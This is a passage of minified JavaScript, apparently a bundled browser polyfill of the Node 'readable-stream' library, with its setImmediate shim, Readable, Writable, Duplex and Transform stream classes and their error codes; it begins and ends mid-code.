ve.data&&0===ve.data.indexOf(D)&&se(+ve.data.slice(D.length))},b.addEventListener?b.addEventListener("message",w,!1):b.attachEvent("onmessage",w),y=function(ve){b.postMessage(D+ve,"*")}):b.MessageChannel?((p=new MessageChannel).port1.onmessage=function(ve){se(ve.data)},y=function(ve){p.port2.postMessage(ve)}):U&&"onreadystatechange"in U.createElement("script")?(M=U.documentElement,y=function(ve){var le=U.createElement("script");le.onreadystatechange=function(){se(ve),le.onreadystatechange=null,M.removeChild(le),le=null},M.appendChild(le)}):y=function(ve){setTimeout(se,0,ve)},K.setImmediate=function(ve){"function"!=typeof ve&&(ve=new Function(""+ve));for(var le=new Array(arguments.length-1),ye=0;ye<le.length;ye++)le[ye]=arguments[ye+1];var z={callback:ve,args:le};return S[x]=z,y(x),x++},K.clearImmediate=ee}function ee(ve){delete S[ve]}function se(ve){if(O)setTimeout(se,0,ve);else{var le=S[ve];if(le){O=!0;try{!function(ye){var z=ye.callback,l=ye.args;switch(l.length){case 0:z();break;case 1:z(l[0]);break;case 2:z(l[0],l[1]);break;case 3:z(l[0],l[1],l[2]);break;default:z.apply(void 0,l)}}(le)}finally{ee(ve),O=!1}}}}}("undefined"==typeof self?void 0===E.g?this:E.g:self)},2830:(Q,F,E)=>{Q.exports=b;var g=E(7187).EventEmitter;function b(){g.call(this)}E(5717)(b,g),b.Readable=E(6577),b.Writable=E(323),b.Duplex=E(8656),b.Transform=E(4473),b.PassThrough=E(2366),b.finished=E(1086),b.pipeline=E(6472),b.Stream=b,b.prototype.pipe=function(_,y){var M=this;function p(K){_.writable&&!1===_.write(K)&&M.pause&&M.pause()}function D(){M.readable&&M.resume&&M.resume()}M.on("data",p),_.on("drain",D),_._isStdio||y&&!1===y.end||(M.on("end",x),M.on("close",S));var w=!1;function x(){w||(w=!0,_.end())}function S(){w||(w=!0,"function"==typeof _.destroy&&_.destroy())}function O(K){if(U(),0===g.listenerCount(this,"error"))throw K}function U(){M.removeListener("data",p),_.removeListener("drain",D),M.removeListener("end",x),M.removeListener("close",S),M.removeListener("error",O),_.removeListener("error",O),M.removeListener("end",U),M.removeListener("close",U),_.removeListener("close",U)}return M.on("error",O),_.on("error",O),M.on("end",U),M.on("close",U),_.on("close",U),_.emit("pipe",M),_}},8106:Q=>{"use strict";var F={};function E(b,_,y){y||(y=Error);var M=function(p){var D,w;function x(S,O,U){return p.call(this,"string"==typeof _?_:_(S,O,U))||this}return w=p,(D=x).prototype=Object.create(w.prototype),D.prototype.constructor=D,D.__proto__=w,x}(y);M.prototype.name=y.name,M.prototype.code=b,F[b]=M}function g(b,_){if(Array.isArray(b)){var y=b.length;return b=b.map(function(M){return String(M)}),y>2?"one of ".concat(_," ").concat(b.slice(0,y-1).join(", "),", or ")+b[y-1]:2===y?"one of ".concat(_," ").concat(b[0]," or ").concat(b[1]):"of ".concat(_," ").concat(b[0])}return"of ".concat(_," ").concat(String(b))}E("ERR_INVALID_OPT_VALUE",function(b,_){return'The value "'+_+'" is invalid for option "'+b+'"'},TypeError),E("ERR_INVALID_ARG_TYPE",function(b,_,y){var M,D,w,x,O,K;if("string"==typeof _&&"not "===_.substr(0,"not ".length)?(M="must not be",_=_.replace(/^not /,"")):M="must be",O=b,(void 0===K||K>O.length)&&(K=O.length)," argument"===O.substring(K-" argument".length,K))D="The ".concat(b," ").concat(M," ").concat(g(_,"type"));else{var S=("number"!=typeof x&&(x=0),x+1>(w=b).length||-1===w.indexOf(".",x)?"argument":"property");D='The "'.concat(b,'" ').concat(S," ").concat(M," ").concat(g(_,"type"))}return D+". Received type ".concat(typeof y)},TypeError),E("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),E("ERR_METHOD_NOT_IMPLEMENTED",function(b){return"The "+b+" method is not implemented"}),E("ERR_STREAM_PREMATURE_CLOSE","Premature close"),E("ERR_STREAM_DESTROYED",function(b){return"Cannot call "+b+" after a stream was destroyed"}),E("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),E("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),E("ERR_STREAM_WRITE_AFTER_END","write after end"),E("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),E("ERR_UNKNOWN_ENCODING",function(b){return"Unknown encoding: "+b},TypeError),E("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),Q.exports.q=F},8656:(Q,F,E)=>{"use strict";var g=E(4155),b=Object.keys||function(O){var U=[];for(var K in O)U.push(K);return U};Q.exports=w;var _=E(6577),y=E(323);E(5717)(w,_);for(var M=b(y.prototype),p=0;p<M.length;p++){var D=M[p];w.prototype[D]||(w.prototype[D]=y.prototype[D])}function w(O){if(!(this instanceof w))return new w(O);_.call(this,O),y.call(this,O),this.allowHalfOpen=!0,O&&(!1===O.readable&&(this.readable=!1),!1===O.writable&&(this.writable=!1),!1===O.allowHalfOpen&&(this.allowHalfOpen=!1,this.once("end",x)))}function x(){this._writableState.ended||g.nextTick(S,this)}function S(O){O.end()}Object.defineProperty(w.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),Object.defineProperty(w.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(w.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(w.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&void 0!==this._writableState&&this._readableState.destroyed&&this._writableState.destroyed},set:function(O){void 0!==this._readableState&&void 0!==this._writableState&&(this._readableState.destroyed=O,this._writableState.destroyed=O)}})},2366:(Q,F,E)=>{"use strict";Q.exports=b;var g=E(4473);function b(_){if(!(this instanceof b))return new b(_);g.call(this,_)}E(5717)(b,g),b.prototype._transform=function(_,y,M){M(null,_)}},6577:(Q,F,E)=>{"use strict";var g,b=E(4155);Q.exports=v,v.ReadableState=A,E(7187);var _,y=function(De,Ve){return De.listeners(Ve).length},M=E(3194),p=E(8764).Buffer,D=E.g.Uint8Array||function(){},w=E(5575);_=w&&w.debuglog?w.debuglog("stream"):function(){};var x,S,O,U=E(9686),K=E(1029),ee=E(94).getHighWaterMark,se=E(8106).q,ve=se.ERR_INVALID_ARG_TYPE,le=se.ERR_STREAM_PUSH_AFTER_EOF,ye=se.ERR_METHOD_NOT_IMPLEMENTED,z=se.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;E(5717)(v,M);var l=K.errorOrDestroy,f=["error","close","destroy","pause","resume"];function A(De,Ve,ze){g=g||E(8656),"boolean"!=typeof ze&&(ze=Ve instanceof g),this.objectMode=!!(De=De||{}).objectMode,ze&&(this.objectMode=this.objectMode||!!De.readableObjectMode),this.highWaterMark=ee(this,De,"readableHighWaterMark",ze),this.buffer=new U,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==De.emitClose,this.autoDestroy=!!De.autoDestroy,this.destroyed=!1,this.defaultEncoding=De.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,De.encoding&&(x||(x=E(2553).s),this.decoder=new x(De.encoding),this.encoding=De.encoding)}function v(De){if(g=g||E(8656),!(this instanceof v))return new v(De);this._readableState=new A(De,this,this instanceof g),this.readable=!0,De&&("function"==typeof De.read&&(this._read=De.read),"function"==typeof De.destroy&&(this._destroy=De.destroy)),M.call(this)}function P(De,Ve,ze,me,Ke){_("readableAddChunk",Ve);var rt,Qe,ht,mt,lt,Ge=De._readableState;if(null===Ve)Ge.reading=!1,function(Qe,ht){if(_("onEofChunk"),!ht.ended){if(ht.decoder){var mt=ht.decoder.end();mt&&mt.length&&(ht.buffer.push(mt),ht.length+=ht.objectMode?1:mt.length)}ht.ended=!0,ht.sync?h(Qe):(ht.needReadable=!1,ht.emittedReadable||(ht.emittedReadable=!0,R(Qe)))}}(De,Ge);else if(Ke||(Qe=Ge,p.isBuffer(lt=ht=Ve)||lt instanceof D||"string"==typeof ht||void 0===ht||Qe.objectMode||(mt=new ve("chunk",["string","Buffer","Uint8Array"],ht)),rt=mt),rt)l(De,rt);else if(Ge.objectMode||Ve&&Ve.length>0)if("string"==typeof Ve||Ge.objectMode||Object.getPrototypeOf(Ve)===p.prototype||(Ve=function(Qe){return p.from(Qe)}(Ve)),me)Ge.endEmitted?l(De,new z):G(De,Ge,Ve,!0);else if(Ge.ended)l(De,new le);else{if(Ge.destroyed)return!1;Ge.reading=!1,Ge.decoder&&!ze?(Ve=Ge.decoder.write(Ve),Ge.objectMode||0!==Ve.length?G(De,Ge,Ve,!1):J(De,Ge)):G(De,Ge,Ve,!1)}else me||(Ge.reading=!1,J(De,Ge));return!Ge.ended&&(Ge.length<Ge.highWaterMark||0===Ge.length)}function G(De,Ve,ze,me){Ve.flowing&&0===Ve.length&&!Ve.sync?(Ve.awaitDrain=0,De.emit("data",ze)):(Ve.length+=Ve.objectMode?1:ze.length,me?Ve.buffer.unshift(ze):Ve.buffer.push(ze),Ve.needReadable&&h(De)),J(De,Ve)}Object.defineProperty(v.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&this._readableState.destroyed},set:function(De){this._readableState&&(this._readableState.destroyed=De)}}),v.prototype.destroy=K.destroy,v.prototype._undestroy=K.undestroy,v.prototype._destroy=function(De,Ve){Ve(De)},v.prototype.push=function(De,Ve){var ze,me=this._readableState;return me.objectMode?ze=!0:"string"==typeof De&&((Ve=Ve||me.defaultEncoding)!==me.encoding&&(De=p.from(De,Ve),Ve=""),ze=!0),P(this,De,Ve,!1,ze)},v.prototype.unshift=function(De){return P(this,De,null,!0,!1)},v.prototype.isPaused=function(){return!1===this._readableState.flowing},v.prototype.setEncoding=function(De){x||(x=E(2553).s);var Ve=new x(De);this._readableState.decoder=Ve,this._readableState.encoding=this._readableState.decoder.encoding;for(var ze=this._readableState.buffer.head,me="";null!==ze;)me+=Ve.write(ze.data),ze=ze.next;return this._readableState.buffer.clear(),""!==me&&this._readableState.buffer.push(me),this._readableState.length=me.length,this};var X=1073741824;function L(De,Ve){return De<=0||0===Ve.length&&Ve.ended?0:Ve.objectMode?1:De!=De?Ve.flowing&&Ve.length?Ve.buffer.head.data.length:Ve.length:(De>Ve.highWaterMark&&(Ve.highWaterMark=((ze=De)>=X?ze=X:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze)),De<=Ve.length?De:Ve.ended?Ve.length:(Ve.needReadable=!0,0));var ze}function h(De){var Ve=De._readableState;_("emitReadable",Ve.needReadable,Ve.emittedReadable),Ve.needReadable=!1,Ve.emittedReadable||(_("emitReadable",Ve.flowing),Ve.emittedReadable=!0,b.nextTick(R,De))}function R(De){var Ve=De._readableState;_("emitReadable_",Ve.destroyed,Ve.length,Ve.ended),Ve.destroyed||!Ve.length&&!Ve.ended||(De.emit("readable"),Ve.emittedReadable=!1),Ve.needReadable=!Ve.flowing&&!Ve.ended&&Ve.length<=Ve.highWaterMark,Ue(De)}function J(De,Ve){Ve.readingMore||(Ve.readingMore=!0,b.nextTick(Z,De,Ve))}function Z(De,Ve){for(;!Ve.reading&&!Ve.ended&&(Ve.length<Ve.highWaterMark||Ve.flowing&&0===Ve.length);){var ze=Ve.length;if(_("maybeReadMore read 0"),De.read(0),ze===Ve.length)break}Ve.readingMore=!1}function ue(De){var Ve=De._readableState;Ve.readableListening=De.listenerCount("readable")>0,Ve.resumeScheduled&&!Ve.paused?Ve.flowing=!0:De.listenerCount("data")>0&&De.resume()}function Ie(De){_("readable nexttick read 0"),De.read(0)}function Ae(De,Ve){_("resume",Ve.reading),Ve.reading||De.read(0),Ve.resumeScheduled=!1,De.emit("resume"),Ue(De),Ve.flowing&&!Ve.reading&&De.read(0)}function Ue(De){var Ve=De._readableState;for(_("flow",Ve.flowing);Ve.flowing&&null!==De.read(););}function Xe(De,Ve){return 0===Ve.length?null:(Ve.objectMode?ze=Ve.buffer.shift():!De||De>=Ve.length?(ze=Ve.decoder?Ve.buffer.join(""):1===Ve.buffer.length?Ve.buffer.first():Ve.buffer.concat(Ve.length),Ve.buffer.clear()):ze=Ve.buffer.consume(De,Ve.decoder),ze);var ze}function He(De){var Ve=De._readableState;_("endReadable",Ve.endEmitted),Ve.endEmitted||(Ve.ended=!0,b.nextTick(Be,Ve,De))}function Be(De,Ve){if(_("endReadableNT",De.endEmitted,De.length),!De.endEmitted&&0===De.length&&(De.endEmitted=!0,Ve.readable=!1,Ve.emit("end"),De.autoDestroy)){var ze=Ve._writableState;(!ze||ze.autoDestroy&&ze.finished)&&Ve.destroy()}}function qe(De,Ve){for(var ze=0,me=De.length;ze<me;ze++)if(De[ze]===Ve)return ze;return-1}v.prototype.read=function(De){_("read",De),De=parseInt(De,10);var Ve=this._readableState,ze=De;if(0!==De&&(Ve.emittedReadable=!1),0===De&&Ve.needReadable&&((0!==Ve.highWaterMark?Ve.length>=Ve.highWaterMark:Ve.length>0)||Ve.ended))return _("read: emitReadable",Ve.length,Ve.ended),0===Ve.length&&Ve.ended?He(this):h(this),null;if(0===(De=L(De,Ve))&&Ve.ended)return 0===Ve.length&&He(this),null;var me,Ke=Ve.needReadable;return _("need readable",Ke),(0===Ve.length||Ve.length-De<Ve.highWaterMark)&&_("length less than watermark",Ke=!0),Ve.ended||Ve.reading?_("reading or ended",Ke=!1):Ke&&(_("do read"),Ve.reading=!0,Ve.sync=!0,0===Ve.length&&(Ve.needReadable=!0),this._read(Ve.highWaterMark),Ve.sync=!1,Ve.reading||(De=L(ze,Ve))),null===(me=De>0?Xe(De,Ve):null)?(Ve.needReadable=Ve.length<=Ve.highWaterMark,De=0):(Ve.length-=De,Ve.awaitDrain=0),0===Ve.length&&(Ve.ended||(Ve.needReadable=!0),ze!==De&&Ve.ended&&He(this)),null!==me&&this.emit("data",me),me},v.prototype._read=function(De){l(this,new ye("_read()"))},v.prototype.pipe=function(De,Ve){var ze=this,me=this._readableState;switch(me.pipesCount){case 0:me.pipes=De;break;case 1:me.pipes=[me.pipes,De];break;default:me.pipes.push(De)}me.pipesCount+=1,_("pipe count=%d opts=%j",me.pipesCount,Ve);var Ke=Ve&&!1===Ve.end||De===b.stdout||De===b.stderr?xe:rt;function rt(){_("onend"),De.end()}me.endEmitted?b.nextTick(Ke):ze.once("end",Ke),De.on("unpipe",function We(Je,Oe){_("onunpipe"),Je===ze&&Oe&&!1===Oe.hasUnpiped&&(Oe.hasUnpiped=!0,_("cleanup"),De.removeListener("close",lt),De.removeListener("finish",ft),De.removeListener("drain",Ge),De.removeListener("error",mt),De.removeListener("unpipe",We),ze.removeListener("end",rt),ze.removeListener("end",xe),ze.removeListener("data",ht),Qe=!0,!me.awaitDrain||De._writableState&&!De._writableState.needDrain||Ge())});var We,Ge=(We=ze,function(){var Je=We._readableState;_("pipeOnDrain",Je.awaitDrain),Je.awaitDrain&&Je.awaitDrain--,0===Je.awaitDrain&&y(We,"data")&&(Je.flowing=!0,Ue(We))});De.on("drain",Ge);var Qe=!1;function ht(We){_("ondata");var Je=De.write(We);_("dest.write",Je),!1===Je&&((1===me.pipesCount&&me.pipes===De||me.pipesCount>1&&-1!==qe(me.pipes,De))&&!Qe&&(_("false write response, pause",me.awaitDrain),me.awaitDrain++),ze.pause())}function mt(We){_("onerror",We),xe(),De.removeListener("error",mt),0===y(De,"error")&&l(De,We)}function lt(){De.removeListener("finish",ft),xe()}function ft(){_("onfinish"),De.removeListener("close",lt),xe()}function xe(){_("unpipe"),ze.unpipe(De)}return ze.on("data",ht),function(We,Je,Oe){if("function"==typeof We.prependListener)return We.prependListener("error",Oe);We._events&&We._events.error?Array.isArray(We._events.error)?We._events.error.unshift(Oe):We._events.error=[Oe,We._events.error]:We.on("error",Oe)}(De,0,mt),De.once("close",lt),De.once("finish",ft),De.emit("pipe",ze),me.flowing||(_("pipe resume"),ze.resume()),De},v.prototype.unpipe=function(De){var Ve=this._readableState,ze={hasUnpiped:!1};if(0===Ve.pipesCount)return this;if(1===Ve.pipesCount)return De&&De!==Ve.pipes||(De||(De=Ve.pipes),Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1,De&&De.emit("unpipe",this,ze)),this;if(!De){var me=Ve.pipes,Ke=Ve.pipesCount;Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1;for(var rt=0;rt<Ke;rt++)me[rt].emit("unpipe",this,{hasUnpiped:!1});return this}var Ge=qe(Ve.pipes,De);return-1===Ge||(Ve.pipes.splice(Ge,1),Ve.pipesCount-=1,1===Ve.pipesCount&&(Ve.pipes=Ve.pipes[0]),De.emit("unpipe",this,ze)),this},v.prototype.addListener=v.prototype.on=function(De,Ve){var ze=M.prototype.on.call(this,De,Ve),me=this._readableState;return"data"===De?(me.readableListening=this.listenerCount("readable")>0,!1!==me.flowing&&this.resume()):"readable"===De&&(me.endEmitted||me.readableListening||(me.readableListening=me.needReadable=!0,me.flowing=!1,me.emittedReadable=!1,_("on readable",me.length,me.reading),me.length?h(this):me.reading||b.nextTick(Ie,this))),ze},v.prototype.removeListener=function(De,Ve){var ze=M.prototype.removeListener.call(this,De,Ve);return"readable"===De&&b.nextTick(ue,this),ze},v.prototype.removeAllListeners=function(De){var Ve=M.prototype.removeAllListeners.apply(this,arguments);return"readable"!==De&&void 0!==De||b.nextTick(ue,this),Ve},v.prototype.resume=function(){var ze,De=this._readableState;return De.flowing||(_("resume"),De.flowing=!De.readableListening,this,(ze=De).resumeScheduled||(ze.resumeScheduled=!0,b.nextTick(Ae,this,ze))),De.paused=!1,this},v.prototype.pause=function(){return _("call pause flowing=%j",this._readableState.flowing),!1!==this._readableState.flowing&&(_("pause"),this._readableState.flowing=!1,this.emit("pause")),this._readableState.paused=!0,this},v.prototype.wrap=function(De){var Ve=this,ze=this._readableState,me=!1;for(var Ke in De.on("end",function(){if(_("wrapped end"),ze.decoder&&!ze.ended){var Ge=ze.decoder.end();Ge&&Ge.length&&Ve.push(Ge)}Ve.push(null)}),De.on("data",function(Ge){_("wrapped data"),ze.decoder&&(Ge=ze.decoder.write(Ge)),ze.objectMode&&null==Ge||(ze.objectMode||Ge&&Ge.length)&&(Ve.push(Ge)||(me=!0,De.pause()))}),De)void 0===this[Ke]&&"function"==typeof De[Ke]&&(this[Ke]=function(Ge){return function(){return De[Ge].apply(De,arguments)}}(Ke));for(var rt=0;rt<f.length;rt++)De.on(f[rt],this.emit.bind(this,f[rt]));return this._read=function(Ge){_("wrapped _read",Ge),me&&(me=!1,De.resume())},this},"function"==typeof Symbol&&(v.prototype[Symbol.asyncIterator]=function(){return void 0===S&&(S=E(828)),S(this)}),Object.defineProperty(v.prototype,"readableHighWaterMark",{enumerable:!1,get:function(){return this._readableState.highWaterMark}}),Object.defineProperty(v.prototype,"readableBuffer",{enumerable:!1,get:function(){return this._readableState&&this._readableState.buffer}}),Object.defineProperty(v.prototype,"readableFlowing",{enumerable:!1,get:function(){return this._readableState.flowing},set:function(De){this._readableState&&(this._readableState.flowing=De)}}),v._fromList=Xe,Object.defineProperty(v.prototype,"readableLength",{enumerable:!1,get:function(){return this._readableState.length}}),"function"==typeof Symbol&&(v.from=function(De,Ve){return void 0===O&&(O=E(1265)),O(v,De,Ve)})},4473:(Q,F,E)=>{"use strict";Q.exports=w;var g=E(8106).q,b=g.ERR_METHOD_NOT_IMPLEMENTED,_=g.ERR_MULTIPLE_CALLBACK,y=g.ERR_TRANSFORM_ALREADY_TRANSFORMING,M=g.ERR_TRANSFORM_WITH_LENGTH_0,p=E(8656);function D(O,U){var K=this._transformState;K.transforming=!1;var ee=K.writecb;if(null===ee)return this.emit("error",new _);K.writechunk=null,K.writecb=null,null!=U&&this.push(U),ee(O);var se=this._readableState;se.reading=!1,(se.needReadable||se.length<se.highWaterMark)&&this._read(se.highWaterMark)}function w(O){if(!(this instanceof w))return new w(O);p.call(this,O),this._transformState={afterTransform:D.bind(this),needTransform:!1,transforming:!1,writecb:null,writechunk:null,writeencoding:null},this._readableState.needReadable=!0,this._readableState.sync=!1,O&&("function"==typeof O.transform&&(this._transform=O.transform),"function"==typeof O.flush&&(this._flush=O.flush)),this.on("prefinish",x)}function x(){var O=this;"function"!=typeof this._flush||this._readableState.destroyed?S(this,null,null):this._flush(function(U,K){S(O,U,K)})}function S(O,U,K){if(U)return O.emit("error",U);if(null!=K&&O.push(K),O._writableState.length)throw new M;if(O._transformState.transforming)throw new y;return O.push(null)}E(5717)(w,p),w.prototype.push=function(O,U){return this._transformState.needTransform=!1,p.prototype.push.call(this,O,U)},w.prototype._transform=function(O,U,K){K(new b("_transform()"))},w.prototype._write=function(O,U,K){var ee=this._transformState;if(ee.writecb=K,ee.writechunk=O,ee.writeencoding=U,!ee.transforming){var se=this._readableState;(ee.needTransform||se.needReadable||se.length<se.highWaterMark)&&this._read(se.highWaterMark)}},w.prototype._read=function(O){var U=this._transformState;null===U.writechunk||U.transforming?U.needTransform=!0:(U.transforming=!0,this._transform(U.writechunk,U.writeencoding,U.afterTransform))},w.prototype._destroy=function(O,U){p.prototype._destroy.call(this,O,function(K){U(K)})}},323:(Q,F,E)=>{"use strict";var g,b=E(4155);function _(J){var Z=this;this.next=null,this.entry=null,this.finish=function(){!function(ue,Ie,Ae){var Ue=ue.entry;for(ue.entry=null;Ue;){var Xe=Ue.callback;Ie.pendingcb--,Xe(void 0),Ue=Ue.next}Ie.corkedRequestsFree.next=ue}(Z,J)}}Q.exports=v,v.WritableState=A;var y,M={deprecate:E(4927)},p=E(3194),D=E(8764).Buffer,w=E.g.Uint8Array||function(){},x=E(1029),S=E(94).getHighWaterMark,O=E(8106).q,U=O.ERR_INVALID_ARG_TYPE,K=O.ERR_METHOD_NOT_IMPLEMENTED,ee=O.ERR_MULTIPLE_CALLBACK,se=O.ERR_STREAM_CANNOT_PIPE,ve=O.ERR_STREAM_DESTROYED,le=O.ERR_STREAM_NULL_VALUES,ye=O.ERR_STREAM_WRITE_AFTER_END,z=O.ERR_UNKNOWN_ENCODING,l=x.errorOrDestroy;function f(){}function A(J,Z,ue){g=g||E(8656),"boolean"!=typeof ue&&(ue=Z instanceof g),this.objectMode=!!(J=J||{}).objectMode,ue&&(this.objectMode=this.objectMode||!!J.writableObjectMode),this.highWaterMark=S(this,J,"writableHighWaterMark",ue),this.finalCalled=!1,this.needDrain=!1,this.ending=!1,this.ended=!1,this.finished=!1,this.destroyed=!1,this.decodeStrings=!(!1===J.decodeStrings),this.defaultEncoding=J.defaultEncoding||"utf8",this.length=0,this.writing=!1,this.corked=0,this.sync=!0,this.bufferProcessing=!1,this.onwrite=function(Ae){!function(Ue,Xe){var Ve,He=Ue._writableState,Be=He.sync,qe=He.writecb;if("function"!=typeof qe)throw new ee;if((Ve=He).writing=!1,Ve.writecb=null,Ve.length-=Ve.writelen,Ve.writelen=0,Xe)!function(Ve,ze,me,Ke,rt){--ze.pendingcb,me?(b.nextTick(rt,Ke),b.nextTick(R,Ve,ze),Ve._writableState.errorEmitted=!0,l(Ve,Ke)):(rt(Ke),Ve._writableState.errorEmitted=!0,l(Ve,Ke),R(Ve,ze))}(Ue,He,Be,Xe,qe);else{var De=L(He)||Ue.destroyed;De||He.corked||He.bufferProcessing||!He.bufferedRequest||X(Ue,He),Be?b.nextTick(G,Ue,He,De,qe):G(Ue,He,De,qe)}}(Z,Ae)},this.writecb=null,this.writelen=0,this.bufferedRequest=null,this.lastBufferedRequest=null,this.pendingcb=0,this.prefinished=!1,this.errorEmitted=!1,this.emitClose=!1!==J.emitClose,this.autoDestroy=!!J.autoDestroy,this.bufferedRequestCount=0,this.corkedRequestsFree=new _(this)}function v(J){var Z=this instanceof(g=g||E(8656));if(!Z&&!y.call(v,this))return new v(J);this._writableState=new A(J,this,Z),this.writable=!0,J&&("function"==typeof J.write&&(this._write=J.write),"function"==typeof J.writev&&(this._writev=J.writev),"function"==typeof J.destroy&&(this._destroy=J.destroy),"function"==typeof J.final&&(this._final=J.final)),p.call(this)}function P(J,Z,ue,Ie,Ae,Ue,Xe){Z.writelen=Ie,Z.writecb=Xe,Z.writing=!0,Z.sync=!0,Z.destroyed?Z.onwrite(new ve("write")):ue?J._writev(Ae,Z.onwrite):J._write(Ae,Ue,Z.onwrite),Z.sync=!1}function G(J,Z,ue,Ie){var Ae,Ue;ue||(Ae=J,0===(Ue=Z).length&&Ue.needDrain&&(Ue.needDrain=!1,Ae.emit("drain"))),Z.pendingcb--,Ie(),R(J,Z)}function X(J,Z){Z.bufferProcessing=!0;var ue=Z.bufferedRequest;if(J._writev&&ue&&ue.next){var Ae=new Array(Z.bufferedRequestCount),Ue=Z.corkedRequestsFree;Ue.entry=ue;for(var Xe=0,He=!0;ue;)Ae[Xe]=ue,ue.isBuf||(He=!1),ue=ue.next,Xe+=1;Ae.allBuffers=He,P(J,Z,!0,Z.length,Ae,"",Ue.finish),Z.pendingcb++,Z.lastBufferedRequest=null,Ue.next?(Z.corkedRequestsFree=Ue.next,Ue.next=null):Z.corkedRequestsFree=new _(Z),Z.bufferedRequestCount=0}else{for(;ue;){var Be=ue.chunk;if(P(J,Z,!1,Z.objectMode?1:Be.length,Be,ue.encoding,ue.callback),ue=ue.next,Z.bufferedRequestCount--,Z.writing)break}null===ue&&(Z.lastBufferedRequest=null)}Z.bufferedRequest=ue,Z.bufferProcessing=!1}function L(J){return J.ending&&0===J.length&&null===J.bufferedRequest&&!J.finished&&!J.writing}function h(J,Z){J._final(function(ue){Z.pendingcb--,ue&&l(J,ue),Z.prefinished=!0,J.emit("prefinish"),R(J,Z)})}function R(J,Z){var Ae,Ue,ue=L(Z);if(ue&&(Ae=J,(Ue=Z).prefinished||Ue.finalCalled||("function"!=typeof Ae._final||Ue.destroyed?(Ue.prefinished=!0,Ae.emit("prefinish")):(Ue.pendingcb++,Ue.finalCalled=!0,b.nextTick(h,Ae,Ue))),0===Z.pendingcb&&(Z.finished=!0,J.emit("finish"),Z.autoDestroy))){var Ie=J._readableState;(!Ie||Ie.autoDestroy&&Ie.endEmitted)&&J.destroy()}return ue}E(5717)(v,p),A.prototype.getBuffer=function(){for(var J=this.bufferedRequest,Z=[];J;)Z.push(J),J=J.next;return Z},function(){try{Object.defineProperty(A.prototype,"buffer",{get:M.deprecate(function(){return this.getBuffer()},"_writableState.buffer is deprecated. Use _writableState.getBuffer instead.","DEP0003")})}catch(J){}}(),"function"==typeof Symbol&&Symbol.hasInstance&&"function"==typeof Function.prototype[Symbol.hasInstance]?(y=Function.prototype[Symbol.hasInstance],Object.defineProperty(v,Symbol.hasInstance,{value:function(J){return!!y.call(this,J)||this===v&&J&&J._writableState instanceof A}})):y=function(J){return J instanceof this},v.prototype.pipe=function(){l(this,new se)},v.prototype.write=function(J,Z,ue){var Ie,He,Be,qe,Ae=this._writableState,Ue=!1,Xe=!Ae.objectMode&&(D.isBuffer(Ie=J)||Ie instanceof w);return Xe&&!D.isBuffer(J)&&(J=D.from(J)),"function"==typeof Z&&(ue=Z,Z=null),Xe?Z="buffer":Z||(Z=Ae.defaultEncoding),"function"!=typeof ue&&(ue=f),Ae.ending?(He=this,Be=ue,qe=new ye,l(He,qe),b.nextTick(Be,qe)):(Xe||function(He,Be,qe,De){var Ve;return null===qe?Ve=new le:"string"==typeof qe||Be.objectMode||(Ve=new U("chunk",["string","Buffer"],qe)),!Ve||(l(He,Ve),b.nextTick(De,Ve),!1)}(this,Ae,J,ue))&&(Ae.pendingcb++,Ue=function(He,Be,qe,De,Ve,ze){if(!qe){var me=(ht=De,(Qe=Be).objectMode||!1===Qe.decodeStrings||"string"!=typeof ht||(ht=D.from(ht,Ve)),ht);De!==me&&(qe=!0,Ve="buffer",De=me)}var Qe,ht,Ke=Be.objectMode?1:De.length;Be.length+=Ke;var rt=Be.length<Be.highWaterMark;if(rt||(Be.needDrain=!0),Be.writing||Be.corked){var Ge=Be.lastBufferedRequest;Be.lastBufferedRequest={chunk:De,encoding:Ve,isBuf:qe,callback:ze,next:null},Ge?Ge.next=Be.lastBufferedRequest:Be.bufferedRequest=Be.lastBufferedRequest,Be.bufferedRequestCount+=1}else P(He,Be,!1,Ke,De,Ve,ze);return rt}(this,Ae,Xe,J,Z,ue)),Ue},v.prototype.cork=function(){this._writableState.corked++},v.prototype.uncork=function(){var J=this._writableState;J.corked&&(J.corked--,J.writing||J.corked||J.bufferProcessing||!J.bufferedRequest||X(this,J))},v.prototype.setDefaultEncoding=function(J){if("string"==typeof J&&(J=J.toLowerCase()),!(["hex","utf8","utf-8","ascii","binary","base64","ucs2","ucs-2","utf16le","utf-16le","raw"].indexOf((J+"").toLowerCase())>-1))throw new z(J);return this._writableState.defaultEncoding=J,this},Object.defineProperty(v.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(v.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),v.prototype._write=function(J,Z,ue){ue(new K("_write()"))},v.prototype._writev=null,v.prototype.end=function(J,Z,ue){var Ue,Xe,Ie=this._writableState;return"function"==typeof J?(ue=J,J=null,Z=null):"function"==typeof Z&&(ue=Z,Z=null),null!=J&&this.write(J,Z),Ie.corked&&(Ie.corked=1,this.uncork()),Ie.ending||(this,Xe=ue,(Ue=Ie).ending=!0,R(this,Ue),Xe&&(Ue.finished?b.nextTick(Xe):this.once("finish",Xe)),Ue.ended=!0,this.writable=!1),this},Object.defineProperty(v.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(v.prototype,"destroyed",{enumerable:!1,get:function(){return void 